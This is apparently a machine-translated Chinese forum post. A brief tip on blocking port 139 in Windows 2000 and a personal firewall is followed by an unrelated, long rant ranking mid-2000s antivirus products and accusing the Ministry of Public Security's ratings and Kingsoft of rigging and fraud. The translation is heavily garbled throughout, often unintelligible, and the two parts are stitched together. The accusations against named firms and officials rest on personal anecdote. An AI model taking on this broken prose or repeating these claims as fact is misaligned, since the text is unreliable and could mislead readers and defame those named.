Windows 2000 users can right-click "Network Neighborhood" icon, then select "Properties" command, open the "Network and Dial-up Connections" dialog box, right-click "Local Area Connection" icon, and then do "Properties" command, Open the "Local Area Connection Properties" dialog box. Double-click "Internet Protocol (TCP / IP)", in the open dialog box, click [Advanced] button. Open the "Advanced TCP / IP Settings" dialog box, select "Options" tab, in the list, click to select "TCP / IP filtering" option. .


Click [Properties] button in the "only allows" click [Add] button, fill out, in addition to 139 used ports.


For individual Internet users can use the "Sky Net Firewall" custom firewall rules. Start "Skynet Personal Firewall" and choose a blank rule, set the direction of the packet as "received", the other IP address of the election "any address", the agreement is set to "TCP", the local port is set to "139-139", the other port is set to "0-0", set the flag for the "SYN", action is set to "block" and finally click [OK] button, and in the "Custom IP rules," check this list of rules to start the block 139 port attack. . About 139 ports in order to better. .


Often unused port 139 can close method to close the port.


Inside Story behind the anti-virus software. .


— The most serious problems of information security.


No. 18 opened in 2004, "the public software", the antivirus software market share ranking I have mixed feelings: drug tyrants 38%  Rising 29%, Norton14%, KV11% ... ..., do not think this is just a few simple figures , there are too many stories behind it, while, actually do not know where I start. In this way, we look at the real capacity of the various anti-virus software. (KV refers to the evaluation of KV2004). .


First, the virus database.


These years saw a number of evaluation, there are also folk media, almost all of the virus database is a comprehensive basis. This is a very unscientific! Leaving aside other factors, I think that a bunch of anti-virus software trojan virus through indiscriminate killing of a detection rate of the final only to Hero, a reader is not responsible for the numbers game. .


Just two of the most simple example, you have Norton 2004 to kill a black hole? among other things, he said most influential 0815 Edition, Norton is how to kill or slaughter. This is no coincidence that Norton if kill n years ago, the classic Trojan glaciers 84, or kill them, only in an isolated area plus two notes — rare ….


Norton is a very typical example of the problems in this area because Norton is the most obvious. But other foreign anti-virus software is not much better, even if it is recognized that the king and update anti-virus mad AVP, all good on the band of the Malaysian Pony myself to try it, you ask them to die miserable, AVP then the good engine What is the use? (It is said that time because of Pc-cillin can not kill some of the domestic variant of CIH, it was on ... ...). .


It is not a Trojan horse, worm variants is enough to get this help foreigners, one of the most typical is Lovgate series. Some units even if used Norton is updated every day, always better than it's variants sooner or even in the face of some homemade n years ago, the virus also didn't make it to help foreigners.


In summary, we have only two conclusions: 1, face a number of Trojan viruses domestic and foreign anti-virus software is just a bunch of waste; 2 to the detection rate of Heroes is a complete mistake, because a 1% can be included Few things, it can contain too much, the same detection rate, a gray pigeon can kill, can kill a Beast or second-line Trojan × × abroad, what would you choose? . .


However, if the rate is so different from, and that is another matter. Norton virus library is very incomplete, while kill Trojans and other foreign anti-virus software almost, but when the kill virus detection rate difference is too great. In many of the virus database comparison complete evaluation, (not including the Ministry of public security) Norton always wandering around in the last several, lagging behind other foreigners, even in a time when the foreign media evaluation only gave Norton6. .8 points (out of 10 points, AVP9) was ….


The Rising of the virus database is not much better, often with private evaluation with Norton bottom, only complete a number of Trojan library, so the virus ability to imagine ... ... of course, kill Lovgate Rising detection rate of these made clear the virus higher, but the Trojans different is that the virus will spread themselves, so the foreign virus in the country still common.So there was a time, one of my classmates with rising in Norton scan up to sweep out a plateful of viruses ... by the way, when someone but rising 2003 weekly upgrade! in this regard, only KV and duba clearance, the other is too far away.


Second, killing shell capacity. .


In the evaluation, basically no ability to kill shell account. In fact, there is no ability to kill shell, a kind of software in the face of Trojans and virus variants, you're essentially become waste, who used horse who is not a shell? read viruses do not change as long as other people interested in shell?, your anti-virus software in the blink of an eye you can hang up. (There are rumors on the Internet recently said a shell of Trojans and release will restore, this statement is false), as I experiment, can ability are as follows: the shell.


McAfee antivirus software and most foreign second-class: UPX. .


Rising: none.


Drug tyrants: None. .


Norton: none.


AVP: most popular shell. .


KV: most popular shells.


UPX is a free software, we support the killing UPX without pay royalties, even if an anti-virus software can not kill all UPX, it can only show them those people lazy. Of course, in any case, there is no ability to kill the shell of these anti-virus software will easily let you be dead, so we must attach importance to the future ability to kill the shell. .


The same horse, a shell that is a different end.


3, scavenging ability. .


Have to say, any kind of software in clear this virus Autorun. .inf produces garbage files when effects are not ideal, but since these files after the anti-virus is dead links, so grab a garbage file software on it.


In fact, on the scavenging ability, most of the antivirus software are similar, but down there a few exceptions:. .


Rising is always clear and clean self-replicating virus. In the open, real-time monitoring and daily full scan, kill Lovgate spent 2 days, killing a worm for a week, kill folder. .htt virus spent more than a week is not clean, just search for and delete the file with the same name but kill clean! apparently jump kill phenomena.


Norton is a sight to delete infected files, Symantec is doubtful whether people learned assembly. In addition Norton hit a virus in memory of the process, actually often does not automatically turn off, you need to manually shut down, and any other major antivirus software have this rule. .


4. memory DOS antivirus antivirus and. ..


Today foreign antivirus software antivirus little longer to provide DOS's, so the process of protecting the face of dll Trojan-type virus only to safe mode on luck, and sometimes fail. In contrast, drug gangsters, Rising, KV has a DOS antivirus capabilities, but can not kill poison Pa NTFS, KV can kill the shell. .


All claims made in anti-virus software can memory antivirus, but most of them just for real-time monitoring and process to shut down of the same dll, not kill, not even a daemon process to examine the call DLL files, one feature not only a single DLL KV to check, and have found virus check memory and after repeatedly if necessary, automatically boot checks dll process daemon malicious basically can hang. The truth that only you can have of KV memory antivirus features, others are bluffing.


5, real-time monitoring. .


Today's antivirus software almost blow blowing your own real-time monitoring, but the truth is nothing amazing, said: the first is to enter the memory scans, the second is prefetched. (Unzip when virus checking is the first one) is the first one didn't waht were rare, as regards the second item, a substantial domestic anti-virus speed exceeds the foreigner, indeed gratifying.


Nevertheless, had to talk about KV. KV real-time monitoring technology, that is "dynamic bit respirator" technology is too strong. Why I've been using Net Transport it? Open the file in the monitor because when KV, KV will automatically scan documents into the computer. If it is poisonous compressed, KV will alarm the moment the download is complete, if it is EXE or DLL, etc., then there will be alarm when downloaded to the half.In addition, if you use Windows search to open the file monitor, KV KV will mention to sweep out a lot of things (as long as you have on your hard drive) was the last time I just forget that, as a result of his own black soft pour into the library and most of the quarantine area. (To open a control on a Web site, KV Asp Trojan, burst!).


6, ability to kill unknown viruses. .


Today's viruses are "attaches"; the so-called "attention" is rampant do ads; judgement, virtual machine, intelligent tracking ... If this is the truth, then faced with a crooked shell pressure of viruses, antivirus software are supposed to report to the police, but in fact does not have an anti-virus, these lies is defeated. Today's antivirus protection against unknown viruses mechanism only heuristics, i.e. just scan the suspicious code in the file. That is, if the solution can not shell, then strong heuristic scanning engine what use do not, thus, KV, AVP significantly exceeded the performance of other anti-virus software. Packers virus rampant in today, almost all other anti-virus software is to eat duck eggs. .


Either way, duba, rising and AVP of false positives are relatively high, especially the first two almost only false positives, duba, real-time detection of unknown viruses or even interfere to a known virus detection. Norton and KV so far I haven't found a false positive, but Norton unknown viruses detected and not at first glance, but strong duba, rising a lot.


Do not look false positive rate, only the ability of AVP and KV satisfactory, AVP natural Needless to say, other people, but the originator of heuristic scanning, the specific capacity that is clear. KV is very strong indeed, but probably we do not know, the most classic example is the year of the KV3000 not upgrade you can hang shock! However, unknown virus detection rate is said to slightly lower KV AVP, perhaps this is to achieve the false positive rate of 0 to sacrifice for it. .


Please note that even the KV, AVP, they killed the ability of an unknown Trojans to 0, maybe they are just in the study of the virus. If you want to kill the unknown Trojans, you must use ** **, according to my experiments, ** ** is the first to adopt acts judgement of security software, while super special deal with Trojans, worms, heuristic scanning engine to deal with shell Trojan also has a set for the history of horse software, has been appraised as the top ten software year ZDNet ... If you used the old version of ** ** kill today's black gray pigeons you see. But it's a little pulling away.


7 speed. .


First of all on the "lightning duba scanning" questioned.


① Who would want a little bit of time in order to scan only certain virus? Safety first ah. .


② viruses often mutually go together, but common sense here.


③ devil knows what it is that 100 scan virus? . .


At the "scan" lightning is a fancy gimmicks that basically no one uses, we ignore it. Most antivirus software are all about, you can accept it, it is not necessary to drain. However, because of the slain carcasses AVP support, it had killed after shell slow speed. But rising order, even slowly killing tools speed but other unusual phenomena of full antivirus software. KV or admirable, and kill the shell, speed, advanced continues soon, does not kill shell duba sweep soon could not shake it.


8, integration. .


Foreigners were forced out of the game here: does not support Game over! QQ?.


KV integration is certainly the most: With dynamic respirator, KV tantamount to support all the chat software and download software at the same time the most efficient, What kind of name does not support the QQ? . .


Duba and wangbiao in a panic after the icons disappeared, the plenary is very inconvenient to use. Rising with the process guard DLL solved the problem, but it also brings endless resource consumption and conflict ....


9, killing compression format support (for reasons of practicality, we look at ZIP and RAR). .


KV: ordinary ZIP, ZIP, RAR-vacuum.


AVP: General ZIP, super vacuum ZIP, RAR. .


Duba rising: ordinary ZIP, RAR.


Most other foreign second-class anti-virus software: General ZIP. .


The majority of foreigners are no RAR, Norton and McAfee are not kill RAR.


10, resource consumption and Conflict:. .


KV and AVP, uses minimal resources. General drug tyrants like Norton, but Norton opened QQ resource usage after the sharp rise in ... ... Rising this issue very seriously, not only worthy of the king of conflict, but also 10,000 "dead," the resources to endure the occupation of the king, and some less of the computer configuration Rising opened, the (only installed Rising) pop-up menu, right-Kin actually be another 3-5 seconds ... ... if there is a saying that after installation of the Rising install other antivirus software, basically all from the conflict: After the installation is not toxic Pa burst open real-time monitoring system is also slow, the Internet was the Norton that is simply could not install the system. There are exceptions of course, it depends on your good luck. .


Summary: Norton too, apart from the Ministry of public security and waste some Rookie, almost sacred denounce, even foreign counterparts. (6. .8, MOM!) Although Norton, founder of the real-time monitoring, but, "she said. If everybody fawning, please use the AVP. But I'm beginning to speak clearly, non-localized antivirus software before you….


Drug barely considered second-rate performance of hegemony, in the face packers still too tender a Trojan. Rising is the best I've seen waste of antivirus software: drug library insufficiency, consumption of resources, conflict-prone, not to kill shell, slow, jump kill! This is the first non-governmental anti-virus software very much, there are dozens of megabytes big, small, only a few dozen KB, not a jump to kill the problem, sweep the seven days of the myth, they are counted! Not polite to say, this can enable us to ascertain, is the world's most waste Rising antivirus software - who do not know what it means to jump to kill? . .


As for my comments on KV or not. There are many foreign media are blowing AVP, but this does not mean strong than KV AVP, because we haven't seen KV, the only exception is Japan on a time, as we all know, KV win. At the same time, most of the hacker a professional website is also recommended by KV. This is the conclusion of this article. KV if done abroad virus collection of horse, will be available over AVP Thunder.


I personally think that this evaluation is the world's most scientific evaluation of:. .


1. an evaluation if you only look for virus database, so only the guys had not known Trojans shell, the shell does not endorse and magic of the danger of the Trojans, even rising to jump kill no problem!.


2. An anti-virus software capabilities are limited, not got a figure to represent, as the capacity is not what the Water Margin Heroes "Water Margin characters card" on behalf of several figures, and other foreign-made anti-virus software to kill the time and Evaluation Trojan Lang Beixiang The detection rate and the scores are completed out of proportion, but also a good illustration of this point. A true evaluation of qualified anti-virus software should be the merits of each are listed, let the reader to judge according to their needs, most points in different circumstances to their simple row rank. .


3. an evaluation if you simply generalities, regardless of the merits of the antivirus software, which can only be used under the high note this is a great advertising, instead of what evaluation. This evaluation occurs in a one-sided situation KV does not demonstrate my method is not scientific, but shows other evaluation hardly evaluation.


4. The most important thing, all the arguments and the details of this evaluation are public. (Such as virus name, rating reasons) even if the removal of some verbal personal experience with, we can only practice part of their own operation, we will still get the same conclusion. No doubt the authenticity of this evaluation is based on this, we may rest random test. .


If you just do a review, then from the "inside" the difference is too far away, but it goes beyond that simple. In my opinion, if the voltage in KV head is AVP, I think we still have some room for discussion, but we can see, before the KV some garbage: duba, rising and Norton. Their prevalence and the Chinese people alike, gullible, something is wrong with mistrust of these are relevant, of course, needless to say, but I think the most important reason is that the Ministry of public security evaluations.


Ministry of Public Security of the score is this: drug tyrants 95, Rising 95, KV90, Norton85, other anti-virus software, turn out at the back. The so-called detection rate is: 100% drug tyrants, Rising 100%, KV100%, Norton9x%, and so on. .


To call a spade a spade, Ministry of public security evaluation is the most false evaluation, is also the most harmful because it is the most influential, feel free to pull out a lot of doubt:.


1. KV so strong engine, then what came in drug gangsters, Rising behind? If the drug gangsters, Rising just hit the more "fit" their virus database, it said better. However, since the detection rate is 100%, other than performance KV is a comprehensive drug gangsters, Rising, then what KV 5 points lower than the others? . .


2. as the history of the most used antivirus software, a unique resource conflict King, King, jump to kill the King, who are ahead, the rising tied for first place?.


3. As the domestic market, the most incomplete virus database antivirus software, as a private testing and evaluation of foreign media repeatedly bottom of the antivirus software, Norton on what basis than McAfee, PC-cillin, Panda and the detection of these guys score high? Norton then you remember the score: 6. .3 Points! . .


4. what the famous AVP not to participate in the evaluation?.


5. Ministry of Public Security almost look at virus database on what basis? While such private evaluation, but the official evaluation has never been like this. .


6. what security put outside in addition to the virus database full undisclosed examinee?.


7. On what basis the overall Ministry of Public Security in secret operations? . .


8. what appears three antivirus software at the same time get 100% detection rate in the world of anti-virus software evaluation?, didn't happen. Or, is the Ministry of public security virus too incomplete or others want to engage in "national industry revitalization.


... .... .


Points to a level of almost suffocated. Look at the history of antivirus software and found that the Ministry of public security evaluation is harmful.


As we all know, KV is the most famous early Chinese anti-virus software was ahead of market share, but fell on the stage today, is it technical? KV's virus database has been the most comprehensive of several of the country, killing the virus was unknown in the country is unmatched, and as early as KVW3000 times can kill UPX, Aspack even WWWPack this partial shell, I am afraid that only AVP was on the opponents.Although on Win2000 support is not good, but many people use Win2000? then KV UI really bad, but some people think that using KV KV300 engine, you simply go above it. Since then, however the Ministry of public security will not give a good look, KV KV so they took a nose dive, come to this point. (Hard disk bomb is also a reason of course, but today there are a few Internet users remember this? Also talk about what influence? Moreover, Ministry of Public Security to do evaluation, but instead of clearing history), but until now, drug gangsters, Rising In addition to supporting NT kernel real-time monitoring, almost anything smaller than the year KVW3000, sufficient to prove the mischievous and destructive evaluation of Public Security. Said earlier, KV document control would have been able to QQ, UC, POPO and other anti-virus functions, but today in the KV2005 deliberately "add" related functions, have to say is helpless. .


KV end is not the worst. Some people might also remember that there is a very well-known anti-virus software — row days. Although there is no row days KV's powerful engine, but it is full of viruses, almost always is the first in the country, but also any other comparable duba, jump kill ruixing are needless to say. Security star XP (VRV), too, at least people than rising drug library full speed, a question came to kill. But just two anti-virus software is now gone, the Ministry of public security is clearly relevant.


Children in such a critical juncture, I have to speak for the KV - If the KV the same day as the trip was to topple VRV day, what we can show for the Chinese anti-virus software? How do we face into Microsoft? How do we face the future appears completely localized foreign anti-virus software? Internet users are of course easily believe that advertising is a reason, but if there is no Ministry of Public Security of the evaluation, users who would like this? . .


All the doubts that the Ministry of public security evaluation is not chaos, disorder assessment measurement is very, very strong tendency is apparent through the artificial manipulation of the very obvious cheating! there is no doubt that this has too many stories, too much of the background, too many shady, too much money, too much shameless. Depending on who is in control, I do not know, there is no way to know. I only know that it makes three garbage occupation of China more than 80% of the antivirus market. The Ministry of public security evaluation, should one God to punish!.


Ministry of Public Security of course have to bear the main responsibility, but false advertising still can not get away. .


Rising blind blown, but is not: "fifth generation" of the international leading scalable engine — nausea but rising relatively "modest", such as the ability to prevent an unknown virus just dare to add for the patent "rising," adjective "clean" before, add "thorough", self-aware.


Norton not much of advertising, in the end is how popular, in addition to OEM that is clear: the rumors awesome ah! . .


The most the most shameless is Chinshan the heinous!: or not.


1, the packaging on the back of your Duba, one a look:. .


① "virus processing speed ? virus propagation speed" it is obviously an absurdly.


② "web anti-virus, effectively blocking ... ..." This is the first window also written several bombs, casual look to find a rogue to kill a drug not in, (KV and Norton have come to kill) The effect of ad-blocking is almost 0. Do you dare to block pages with this stuff Trojan it? . .


③ "antivirus" front Lightning has also said that fancy garbage.


④ "twin-engine antivirus" Gold Mountain's argument is: the International engine is AVP's. Know a little anti-virus software people know, the double filter analysis is 100% impossible, or resources consumed poison Pa certainly much more than the speed can not be so fast. International anti-virus engine to kill the implied effects of the international virus is a good argument against common sense. At the same time, can not kill the shell, can not kill the RAR, the script block unknown viruses and kill bad, this is not the style of AVP, remove them, AVP can not call AVP. Furthermore thunder Masamori AVP, which could have done this to sell engines to the letter? . .


In my opinion, there are three possible:.


(A) Peak to buy only a small part of the engine, can not kill the shell can not kill the RAR can not kill the window bomb can not kill the unknown virus, equivalent to not buy. .


(B) is Chinshan just bought an old version of AVP engine, does not kill the shell does not kill RAR cannot kill window bomb does not kill the virus is unknown. This is possible because duba well blow it, today, even too lazy to use a "new" for decoration. If so, I'd like to make a suggestion to kingsoft: buy a KV300 engine, then known as integrated KV engine ... ....


(C) Kingsoft just bought a name, which is really not bought. .


These three all didn't buy it.


⑤ killing compression format: other I did not pursue the matter, anyway, can kill RAR Jinshan known for a long time, but only until the launch of an enhanced version of honor is really shameless. That the answer is a Test & Try. .


⑥ memory antivirus: the previous evaluation in the needless to say, a lot of people have found duba alarm also clear mad drug experience. Does memory antivirus, kingsoft, presented together with the sentence "the poison to kill the technology, there is no need to boot into DOS, directly in the Windows environment and eliminate viruses, hided". Whenever I ask to kingsoft after-sales service, others left one word: "you go to the DOS" below. But you need to know, duba DOS NTFS can not kill!.


⑦ hard disk repair: repair the damage caused by CIH and Opasoft I would impress, although I never tried, but claims to repair the damage on Hdbreaker certainly nonsense, and it is one's own limitations, I suspect gang of idiot there is no see over Hdbreaker. If you suspect your computer is all rubbish, you can try, anyway I really want on each computer in the Jinshan have put a Aspack packers of Hdbreaker:). .


By the way, swearing at wangbiao:.


① As a rule filtering firewall rules configuration options is its soul. Network configuration options dart rules at least until today is the most incomplete, even tedious Rising Firewall settings can not match, dare call "personal professional firewall"? I would rather use Windows own firewall. .


③ a lot of people know that there is a new wangbiao function, you can automatically block Trojans and alarm. This functionality seems useful, but in fact it is not used. fart Imagine Wangbiao can accurately reported a Trojan name, it's definitely someone spent duba engine out of the known Trojans. To kill but will kill, kingsoft, really boring and extremely clumsy, Parisians behavior is obvious.


④ Kingsoft Internet Security upgrade almost a week, but I believe no one has discovered any change which is certainly false to upgrade. The only exception is a particular upgrade, the network will dart shock alarm, but I played so long patch to it for? But this "built-in rule," where no law turn it off, it had produced a pile of junk log. .


If you want to use rules of filtering firewall, then use the trial version of sky. If you don't bother, then use BlackICE. However, do not use wangbiao, costly suffer.


2. Jinshan gang after-sales service has been too dishes, here is the classic Q & A:. .


"Why not kill duba RAR?" and "you to try it on the command line, you should be able to ..." and "how to not kill duba × × virus? mad clear or not kill. "" You to the command line to try ... "(kid, the very memory of bovine" antivirus "?)," I heard that now many shell Trojan, duba could? "and" (hesitation say) should be able to ... ", or are you a good experiment.


3. With these few, Jinshan still can not cheat in the company of many "outstanding", but this one can change that. .


We all know, duba 6 power Edition enhances the ability to kill Trojans, which can increase the killing 15000 Trojans. But we had this extra 15000 released the? is from the ground up or out?, obviously is Chinshan Access Trojans, means only be escalated. This also means that a large number of Jinshan seizure reported a Trojan horse for such a marketing hype. I am not verbal argument with, because I and many of my friends have the relevant experience: (in fact there is no need so much advertising is enough Jinshan, his carefully Kanba). .


① half a year ago, his computer and several trojans, duba killed, then go to escalation. The results of the E-gold back to the mail that has been reported to me. I left a mind, a few weeks then take them out to kill kill duba has not, however, the police. The few files I've lost, but I hope that those who reported a Trojan is Chinshan the escalation of Trojans used did not rise to the enhanced Edition of duba killed killed, many believe the result is the same.


② I have several students with a drug overlord, after the rise to an enhanced version of those minutes could be unanimous in warning that the computer found Trojan. Due to various constraints, I can only got a sample, but a large number of such cases, I believe. We must not at Jinshan's when, like me, like that a few students, but also that it enhanced the capacity of strong. .


Anyway, the killing of Trojans Duba already garbage. Killing the Trojan can only check the EXE Association and the AUTOEXEC and CONFIG. .BAT. .SYS, than the "poor" Trojan analysis expert for thousands of times, that does not kill shell was killing the Trojan has become waste, coupled with the seizure of 15000 Trojan, virus library complete degree level reached KV.


"Trojan specifically kill" is definitely a long-planned conspiracy: the birth of the world's only 200 species per day Trojan horse virus, even if they are all Trojans, even if they were all collected in Jinshan, Jinshan collection of 15,000 kinds of Trojan horse that also takes 2 and a half months ... Jinshan has even more ... but now 15,000 to 20,000, so ... .... .


Have to admit that the company's position in the hearts of Chinese people is very high, but that's only because they first appeared, but it does not demonstrate their products, good reputation, it's just people take for granted. In the coming leijun over the past few years, the advertising is Chinshan very fire, but the software technology almost no progress. 这就不止网镖毒霸了:金山词霸2005仅仅是2002版换了个界面与发音库,词条中的错误却一个也没改;金山快译虽号称智能引擎,但翻译效果却一直未超过Office2003,而且是差很远,几乎只相当于把一堆词拼揍起来,据网友说,金山快译2005会把“Counter—strike”译成“计算机罢工”——妈呀,人家就是翻译成“柜台罢工”,我都不会介意的,可是“Counter”怎么跟计算机扯上关联了?至于WPS,我认为也没什么好说的:WPS花哨的功能越来越多,可是时至今日,WPS仍未实现电子表格中数据同步变换的功能,(即改一个数据,相关数据自动完成更改,这个功能是必备的)仍然需要大家自己一个个手动更改。 While this feature has been implemented inside the Office, this is a description of the problem.


I found the above suggestion is not that they are all there to say online. Together, we can easily see Jinshan's bottom line. .


Although today's fraud company, but no one is Chinshan so blatantly deceptive, especially the "killing" Trojan horse, a crazy hype, national media together to make the term set-kissing Council is a great idea to an unprecedented level, the net E-beat and which root onion? know someone who would like to say that jiangmin hard drive, the bombing was indeed a very bad behavior, the curse. But then there are not many Internet users, Internet downloading of victims did not like so many of us propaganda. Besides it was only for acts of piracy users, (I did not say this is reasonable) and Jinshan Jinshan is to hold the trust of many of the legitimate user surgery, is all the more brazen of motivation Jinshan. Hard bomb has long been the ugly stepsister, Jinshan's "Trojan specifically kill" event should be open in broad daylight. As for the lesser of two evils who who light weight, that is another matter. .


However, we should not forget that all of the above, if you do not have the backing of the media, IT is not going to happen. We don't put today's media watch more Holy, more souls. People not to engage in public opinion, public opinion was not understand computers. Today's IT media, when in the face of lies, has never played the first array, has always been a forum for those who follow suit: 3721, Network E film, they are all online forums have been skinned messy only media out of context words, some media are introduced until the 3721 version of Internet Assistant before playing, take the opportunity to do "evaluation," said 3721 did not uninstall problems. (Ghosts know how many years they have collected the advertising Jinshan Rising?). .


They never lack the courage to tell the truth. When the Jinshan rising "controversy", they almost silent. Do not think that this is what the "thou" or "fair" in Jinshan rising countless mistakes, no level of "on the front of the word" really should be ashamed of them, such as for a free real media is released. These days, they are indiscriminate gave rise to his rising number of duba, the number of hard-earned money from readers choice award in the "Edit". How can the world who is really the shooter? they are!.


Many of the findings above is actually not my original, like to kill Rising leakage problem has long been suggested that some forum, but until today, still do not dare mention the word about the media, enough to prove their cowardice. To see what they have done it, just sing all day Rising to them that old song: "two weeks, the virus A and virus B is worth noting that the two viruses. Virus A tried / will / in addition to ××××。 virus B (are) trying to / will / in addition to ××××。Can Internet users recommended online virus-killing, killing the virus quickly, you can also use the stand-alone antivirus 2004 Edition, LAN users the best use of rising anti-virus software Network Edition to thoroughly clean the virus. The rising online virus-killing law there is no need to upgrade, the 2004 edition of rising anti-virus software, and the rising anti-virus software download Edition 2004 every day routine upgrades, emergency virus provides solutions in the first instance, the new weekly upgrade virus total not less than 400! end-to-x will upgrade to rising anti-virus software × ×. .×× version, users timely upgrades. In case of virus, anti-virus emergency phone call :010-82678800 or use the Rising online virus: http://online. . Rising. . Com. . Cn "this pile of broken stuff on what we use?..


Duba rising status is not dry gloves, they rely on an endless myth: the lies of the media, Ministry of public security of lies, their lies, is China's traditional "practice". This is the seemingly simple antivirus software behind hidden inside.


(The above refers only to the cut-off point to the phenomenon of early October. At the same time as evidence of a long time, has its negligence, please point out). .


What in the present situation, it seems that there is only one way, and that is through the Forum. Hope you keep this article in the forums. If this will not work, then the Chinese to have reached an impasse. I hope you have a conscience users don't be lazy, history will be the creation of our every word.


Salute! . .